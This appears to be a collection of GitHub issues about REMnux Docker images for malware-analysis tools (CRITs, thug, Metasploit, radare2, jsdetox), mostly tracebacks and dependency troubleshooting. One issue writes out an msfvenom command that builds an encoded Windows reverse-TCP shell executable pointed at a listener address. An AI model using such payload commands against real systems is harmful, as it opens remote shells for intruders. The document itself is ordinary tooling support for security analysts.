After a clean install, I get the message below when accessing the default page:

'NoneType' object has no attribute 'crits_message'

Missing configuration?

It looks like a docker start command after a Crits container was stopped fails because it tries to re-create the user nonroot even though this user already exists. If I look at the docker log for the container I see the following:
Traceback (most recent call last):
File "/data/crits/manage.py", line 10, in
execute_from_command_line(sys.argv)
File "/usr/local/lib/python2.7/dist-packages/django/core/management/init.py", line 399, in execute_from_command_line
utility.execute()
File "/usr/local/lib/python2.7/dist-packages/django/core/management/init.py", line 392, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/usr/local/lib/python2.7/dist-packages/django/core/management/base.py", line 242, in run_from_argv
self.execute(_args, *_options.dict)
File "/usr/local/lib/python2.7/dist-packages/django/core/management/base.py", line 285, in execute
output = self.handle(_args, *_options)
File "/data/crits/crits/core/management/commands/users.py", line 173, in handle
user = CRITsUser.create_user(username, password, email)
File "/data/crits/crits/core/user.py", line 679, in create_user
user.create_api_key("default", analyst, default=True)
File "/data/crits/crits/core/user.py", line 583, in create_api_key
self.save(username=analyst)
File "/data/crits/crits/core/crits_mongoengine.py", line 361, in _custom_save
_refs=_refs)
File "/usr/local/lib/python2.7/dist-packages/mongoengine/document.py", line 286, in save
raise NotUniqueError(message % unicode(err))
mongoengine.errors.NotUniqueError: Tried to save duplicate unique keys (insertDocument :: caused by :: 11000 E11000 duplicate key error index: crits.users.$username_1 dup key: { : "nonroot" })

Can this be fixed easily? I am quite new to Docker and don't know where to start.

Well, using the latest mongodb version, crits server won't start. Not quite sure why. Had to fallback to the latest mongodb from ubuntu repository.

I have tried running this container on Docker for Mac but it keeps spitting out an error:

`$ sudo docker run --rm -it -v ~/crits-data:/home/nonroot/workdir -p 8443:8443 remnux/crits
Unable to find image 'remnux/crits:latest' locally
latest: Pulling from remnux/crits
8aec416115fd: Pull complete
695f074e24e3: Pull complete
946d6c48c2a7: Pull complete
bc7277e579f0: Pull complete
2508cbcde94b: Pull complete
8c5f76692058: Pull complete
c9c95511d79b: Pull complete
9296ab42c531: Pull complete
8ab6493f5e9b: Pull complete
bf7fa77e3078: Pull complete
02d7f025eb5a: Pull complete
1b64f006a9e1: Pull complete
a741d2087cbb: Pull complete
Digest: sha256:f9daf8f6884f43066c2cb8662008903ced075c72d8da51f29fa0c3378086a85b
Status: Downloaded newer image for remnux/crits:latest
2017-03-29 12:08:55,093 CRIT Set uid to user 999
2017-03-29 12:08:55,113 INFO RPC interface 'supervisor' initialized
2017-03-29 12:08:55,113 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-03-29 12:08:55,113 INFO supervisord started with pid 7
2017-03-29 12:08:56,121 INFO spawned: 'mongod' with pid 11
2017-03-29 12:08:56,123 INFO spawned: 'apache2' with pid 12
2017-03-29 12:08:57,173 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-03-29 12:08:57,173 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
about to fork child process, waiting until server is ready for connections.
forked process: 82
child process started successfully, parent exiting
Traceback (most recent call last):
File "/data/crits/manage.py", line 10, in
execute_from_command_line(sys.argv)
File "/usr/local/lib/python2.7/dist-packages/django/core/management/init.py", line 354, in execute_from_command_line
utility.execute()
File "/usr/local/lib/python2.7/dist-packages/django/core/management/init.py", line 303, in execute
settings.INSTALLED_APPS
File "/usr/local/lib/python2.7/dist-packages/django/conf/init.py", line 48, in getattr
self._setup(name)
File "/usr/local/lib/python2.7/dist-packages/django/conf/init.py", line 44, in _setup
self._wrapped = Settings(settings_module)
File "/usr/local/lib/python2.7/dist-packages/django/conf/init.py", line 92, in init
mod = importlib.import_module(self.SETTINGS_MODULE)
File "/usr/lib/python2.7/importlib/init.py", line 37, in import_module
import(name)
File "/data/crits/crits/settings.py", line 117, in
execfile(dbfile)
ValueError: invalid \x escape

$ docker version
Client:
Version: 17.03.0-ce
API version: 1.26
Go version: go1.7.5
Git commit: 60ccb22
Built: Thu Feb 23 10:40:59 2017
OS/Arch: darwin/amd64

Server:
Version: 17.03.0-ce
API version: 1.26 (minimum version 1.12)
Go version: go1.7.5
Git commit: 3a232c8
Built: Tue Feb 28 07:52:04 2017
OS/Arch: linux/amd64
Experimental: true`

I was getting this on an older version of the Docker for Mac Beta so i removed that and installed the current stable version, however my issue still persists.

As such I ran this against a fresh install on a Ubuntu Server box and I get the same outcome:

`$ sudo docker run --rm -it -v ~/crits-data:/home/nonroot/workdir -p 8443:8443 remnux/crits
Unable to find image 'remnux/crits:latest' locally
latest: Pulling from remnux/crits
8aec416115fd: Pull complete
695f074e24e3: Pull complete
946d6c48c2a7: Pull complete
bc7277e579f0: Pull complete
2508cbcde94b: Pull complete
8c5f76692058: Pull complete
c9c95511d79b: Pull complete
9296ab42c531: Pull complete
8ab6493f5e9b: Pull complete
bf7fa77e3078: Pull complete
02d7f025eb5a: Pull complete
1b64f006a9e1: Pull complete
a741d2087cbb: Pull complete
Digest: sha256:f9daf8f6884f43066c2cb8662008903ced075c72d8da51f29fa0c3378086a85b
Status: Downloaded newer image for remnux/crits:latest
2017-03-29 12:20:15,255 CRIT Set uid to user 999
2017-03-29 12:20:15,276 INFO RPC interface 'supervisor' initialized
2017-03-29 12:20:15,276 CRIT Server 'unix_http_server' running without any HTTP authentication checking
2017-03-29 12:20:15,276 INFO supervisord started with pid 7
2017-03-29 12:20:16,279 INFO spawned: 'mongod' with pid 11
2017-03-29 12:20:16,281 INFO spawned: 'apache2' with pid 12
2017-03-29 12:20:17,676 INFO success: mongod entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2017-03-29 12:20:17,676 INFO success: apache2 entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
about to fork child process, waiting until server is ready for connections.
forked process: 75
child process started successfully, parent exiting
2017-03-29 12:20:33,399 INFO exited: mongod (exit status 48; not expected)
Traceback (most recent call last):
File "/data/crits/manage.py", line 10, in
execute_from_command_line(sys.argv)
File "/usr/local/lib/python2.7/dist-packages/django/core/management/init.py", line 354, in execute_from_command_line
utility.execute()
File "/usr/local/lib/python2.7/dist-packages/django/core/management/init.py", line 303, in execute
settings.INSTALLED_APPS
File "/usr/local/lib/python2.7/dist-packages/django/conf/init.py", line 48, in getattr
self._setup(name)
File "/usr/local/lib/python2.7/dist-packages/django/conf/init.py", line 44, in _setup
self._wrapped = Settings(settings_module)
File "/usr/local/lib/python2.7/dist-packages/django/conf/init.py", line 92, in init
mod = importlib.import_module(self.SETTINGS_MODULE)
File "/usr/lib/python2.7/importlib/init.py", line 37, in import_module
import(name)
File "/data/crits/crits/settings.py", line 117, in
execfile(dbfile)
ValueError: invalid \x escape

$ docker version
Client:
Version: 17.03.1-ce
API version: 1.27
Go version: go1.7.5
Git commit: c6d412e
Built: Mon Mar 27 17:14:09 2017
OS/Arch: linux/amd64

Server:
Version: 17.03.1-ce
API version: 1.27 (minimum version 1.12)
Go version: go1.7.5
Git commit: c6d412e
Built: Mon Mar 27 17:14:09 2017
OS/Arch: linux/amd64
Experimental: false`

I've followed the install instructions and created the ~/crits-data folder and set the correct permissions on it, however no dice.

Is there anything obviously wrong that I am doing that would cause this issue?

Hi, so I was working on using Qiling on REMnux and (after adding in the root filesystems and DLLs) noticed some issues with the Unicorn module, failing to import certain things (unicorn.const for example). After looking at the package versions, I eventually realized that while Speakeasy mandates the use of unicorn=1.0.2, Qiling depends on a newer version (unicorn>=2.0.1). I'm more interested in using Qiling because it supports a lot more OSs and architectures; I'm wondering if it's possible to include compatibility for both in REMnux.

Every time the container is opened, it has to forego re-installation because ruby is missing

It is not clear where the current builds of these containers are being done.

Given these are security tools it would be great to see the builds happening in a public build system to increase trust in built Docker containers. TravisCI, CircleCI or the Docker Hub build system would be great.

Happy to help on getting the builds into any of those or any other public build system.

Hi, am srinivasa working as a devops engineer am created simple docker file for my application i need to change some configuration of that application through dockerfile is there any way to change after war file is generated help me for this

Created pull #39 to reduce the image size from 1.95GB to 164MB. It may also update Ciphey to the new version, which was released today.

Main Issue

I am running a docker image on a ubuntu ec2 instance. The command below fails on the ec2 instance but works on my local machine.

*Command
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Output
/usr/local/bin/msfvenom:138:in block in parse_args': uninitialized constant Rex (NameError) from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1571:in block in parse_in_order'
from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1527:in catch' from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1527:in parse_in_order'
from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1521:in order!' from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1613:in permute!'
from /usr/local/rvm/rubies/ruby-2.3.1/lib/ruby/2.3.0/optparse.rb:1635:in parse!' from /usr/local/bin/msfvenom:174:in parse_args'
from /usr/local/bin/msfvenom:287:in `

more info

The container works when I skip the update. This may be an issue upstream with Metasploit.

Installing warden 1.2.7
Installing addressable 2.7.0
Installing aws-sigv4 1.1.0
Installing em-socksify 0.3.2
Installing thin 1.7.2 with native extensions
Installing faraday 0.17.0
Installing jsobfu 0.4.2
Installing rex-socket 0.1.20
Gem::InstallError: rubyzip requires Ruby version >= 2.4.
An error occurred while installing rubyzip (2.0.0), and Bundler cannot continue.
Make sure that `gem install rubyzip -v '2.0.0'` succeeds before bundling.
root@b72975e0d3bb:/tmp/data# gem install rubyzip -v '2.0.0'
ERROR:  Error installing rubyzip:
	rubyzip requires Ruby version >= 2.4.
root@b72975e0d3bb:/tmp/data# msfconsole -q
Your bundle is locked to activesupport (4.2.11.1), but that version could not be found in any of the sources listed in your Gemfile. If you haven't changed sources, that means the author of activesupport (4.2.11.1) has removed it. You'll need to update your bundle to a different version of activesupport (4.2.11.1) that hasn't been removed in order to install.
Run `bundle install` to install missing gems.
root@b72975e0d3bb:/tmp/data#

After running:
gem update --system

This happens:

root@b72975e0d3bb:/tmp/data# msfconsole -q
Could not find activesupport-4.2.11.1 in any of the sources

Then

cd /opt/msf
bundle install

Returns:

Fetching rubyzip 2.0.0
Installing rubyzip 2.0.0
Gem::RuntimeRequirementNotMetError: rubyzip requires Ruby version >= 2.4. The current ruby version is 2.3.1.112.
An error occurred while installing rubyzip (2.0.0), and Bundler cannot continue.
Make sure that `gem install rubyzip -v '2.0.0' --source 'https://rubygems.org/'` succeeds before bundling.

In Gemfile:
  metasploit-framework was resolved to 5.0.54, which depends on
    metasploit-credential was resolved to 3.0.3, which depends on
      rubyzip
root@b72975e0d3bb:/opt/msf#

How can we solve the rubyzip installation?

I'm using the latest version of radare2 docker image.
When I'm running python script from the the container I got this error:
No module named r2pipe.
I tried to install it via pip install r2pipe, but i'm not sudo user on the container.

How to run r2pipe package in the docker image?

Since the latest pull, ruby and rvm are no longer present in the container. Therefore, executing msfconsole or other tools does not work, which renders the container useless.

Also raised this on the official Thug repo

This is taken from the Google Code website https://code.google.com/p/support/wiki/ReadOnlyTransition

After January 2016 you will no longer be able to access source code from a version control client; however project data will still be available from the Google Code Archive.

I know that V8 has officially moved to https://github.com/v8/v8
but i cant find a new 'Official' pyv8

After a fresh install, crits won't open the initial page. I'm not quite sure what to do now.

I just downloaded the image and have been having issues executing seemingly simple code samples.

Sample submitted

console['\x6c\x6f\x67']('\x4e\x65\x74\x53\x65\x63\x20\x66\x6f\x72\x20\x74\x68\x65\x20\x77\x69\x6e\x21');

Decoded Form
console['log']('NetSec for the win!');
 

Error when selecting "Execute"

console is not defined (Line 1)

docker command
docker run --rm -d --name=js -p 3000:3000 remnux/jsdetox

error trace
at <eval>:1:1,/home/nonroot/jsdetox/lib/framework/jsengine_v8.rb:215:in `execute',/home/nonroot/jsdetox/app/controllers/backend.rb:32:in `block (2 levels) in <top (required)>',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:569:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:569:in `block in route',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `[]',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `block (3 levels) in process_destination_path',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:876:in `route_eval',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `block (2 levels) in process_destination_path',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `catch',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:51:in `block in process_destination_path',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:25:in `instance_eval',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:25:in `process_destination_path',(eval):134:in `block (2 levels) in inject_root_methods',(eval):124:in `catch',(eval):124:in `block in inject_root_methods',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router/node/root.rb:92:in `[]',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router.rb:119:in `block in call',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router.rb:119:in `catch',/var/lib/gems/1.9.1/gems/http_router-0.10.2/lib/http_router.rb:119:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:919:in `route!',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/application/routing.rb:909:in `dispatch!',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:794:in `block in call!',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:946:in `block in invoke',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:946:in `catch',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:946:in `invoke',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:794:in `call!',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:780:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/session/abstract/id.rb:225:in `context',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/session/abstract/id.rb:220:in `call',/var/lib/gems/1.9.1/gems/sass-3.4.13/lib/sass/plugin/rack.rb:54:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/head.rb:13:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/methodoverride.rb:22:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/reloader.rb:250:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/logger.rb:388:in `call',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/showexceptions.rb:21:in `call',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1417:in `block in call',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1499:in `synchronize',/var/lib/gems/1.9.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1417:in `call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/router.rb:83:in `block in call',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/router.rb:76:in `each',/var/lib/gems/1.9.1/gems/padrino-core-0.10.6/lib/padrino-core/router.rb:76:in `call',/var/lib/gems/1.9.1/gems/rack-1.6.0/lib/rack/handler/webrick.rb:89:in `service',/usr/lib/ruby/1.9.1/webrick/httpserver.rb:138:in `service',/usr/lib/ruby/1.9.1/webrick/httpserver.rb:94:in `run',/usr/lib/ruby/1.9.1/webrick/server.rb:191:in `block in start_thread'

Using the invocation from the docs, thug works great, but I'm having trouble when I try to share a folder into it. It errors out on permissions.. sometimes. EG:

$ docker run --rm -it -v ~/Desktop/mess/thuglogs:/home/thug/logs remnux/thug ./thug.py 'http://google.com'

Traceback (most recent call last):
 File "./thug.py", line 242, in <module>
Thug(sys.argv[1:])()
 File "/home/thug/src/ThugAPI/ThugAPI.py", line 63, in __call__
self.analyze()
File "./thug.py", line 221, in analyze
self.log_init(args[0])
File "/home/thug/src/ThugAPI/ThugAPI.py", line 185, in log_init
log.ThugLogging.set_basedir(url)
File "/home/thug/src/Logging/BaseLogging.py", line 59, in set_basedir
os.makedirs(self.baseDir)
File "/usr/lib/python2.7/os.py", line 157, in makedirs
mkdir(name, mode)
OSError: [Errno 13] Permission denied: '../logs/4be8c7ad7ca1a9ecd27ab96956468ca8/20150108173240'

Maybe it is creating a folder that the next thug Docker instance can't access unless perms in/of the shared thuglogs folder are reset between invocations. This has helped between invocations, but I don't understand what's causing it:

$ chmod -R o+rwx thuglogs/

By running bash rather than thug in a thug container to take a peek we can see the user id mapping is off but the perms look okay:

thug@8c7d174f26e9:~/src$ ls -ld ~/logs/
drwxrwxrwx 1 1000 staff 272 Jan  8 17:32 /home/thug/logs/

lorelei:mess adric$ ls -ld thuglogs
drwxrwxrwx  8 adric  staff  272 Jan  8 12:32 thuglogs

but a run of thug also fails similarly as above (trimmed):

OSError: [Errno 13] Permission denied: '../logs/67ef91b090ead0b6426960bc5f7cc059/20150108175411'

This folder and all of them are there, but empty.

thug@38edce58f9bc:~/src$ ls -a ~/logs/*/
/home/thug/logs/4be8c7ad7ca1a9ecd27ab96956468ca8/:
.  ..

/home/thug/logs/67ef91b090ead0b6426960bc5f7cc059/:
.  ..

/home/thug/logs/873c87c71f8bf1d15a53ce0c0676971f/:
.  ..

/home/thug/logs/c02b57cf40deb5dd86bf434fc7d4f68f/:
.  ..

/home/thug/logs/c0fd94d2694ae2ac06f5abe87a987b5d/:
.  ..

/home/thug/logs/c7b920f57e553df2bb68272f61570210/:
.  ..

Please help, thanks,
adric

Radare2 framework is providing a DockerFile in his main repo: https://github.com/radare/radare2/blob/master/doc/Dockerfile

Hi at the moment it seems that there are issues with the apt repo of draios.

When trying to use the docker container there are multiple errors using apt.

I tried to reach http://download.draios.com/stable/deb/draios.list manually and it gives and HTTP error 403.

403 Forbidden

Code: AccessDenied
Message: Access Denied
RequestId: EC1XSMFDR3CT780M
HostId: AoCU4+3P7hBfGNW6pToS04/owVC9DgUJQCeoA4S9Lfze0e8DHFnujOeSeQkpRNwNA2vnxOeNMT4=

The Docker image contains two large(r) cache directories:

699M /var/cache/salt
274M /root/.cache

these look like some installation artifacts, could they be removed from the image?

Hi

Been using REMnux distro and in particular the docker image of thug (honeyclient). Very good tool and distro.

Recently I have updated REMnux and thug and for some reason thug is not producing the graph.svg file within analysis folder anymore. I use the command ./thug.py -FZ "[URL]" but I do not get a graph.svg file.

I have installed the latest distro (from website) and updated all items within but still no avail.

Speaking to buffer regarding thug and he has stated that there is no issues with thug.

Please could you assist.

Thanks